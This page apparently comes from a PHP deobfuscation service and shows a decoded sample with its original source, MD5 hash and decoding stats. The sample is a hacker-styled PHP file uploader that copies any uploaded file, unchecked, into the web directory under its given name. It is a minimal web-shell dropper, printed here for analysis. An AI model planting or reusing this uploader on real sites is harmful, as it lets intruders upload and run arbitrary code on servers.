Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<style type="text/css"> body { color: #33ff33; background-color: black; font-wei..
Decoded Output download
<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50">
<input name="_upl" type="submit" id="_upl" value="Upload">
</form>
Did this file decode correctly?
Original Code
<style type="text/css">
body {
color: #33ff33;
background-color: black;
font-weight: inherit;
}
h1,h2{
background-color: #4D4D4D;
color: #000000;
text-align: center;
}
h3,h4,h5{
color: silver;
text-align: center;
}
</style>
<b><br>
<h1> Uploading </h1>
<br><br>
<center>
<font color:"blue">
<span style="font-family: monospace;">
<span style="color: rgb(255, 255, 255);">
<br><br>
<font color="black"></font>
<br></b> <?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50">
<input name="_upl" type="submit" id="_upl" value="Upload">
</form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name']))
{
echo '<b>Archivo subido!</b><br><br>';
}
else
{
echo '<b>Upload Fail!</b><br><br></font>';
}
}
?>
Function Calls
None |
Stats
MD5 | a5167eb36b6bc2d19e902b8a702118ec |
Eval Count | 0 |
Decode Time | 118 ms |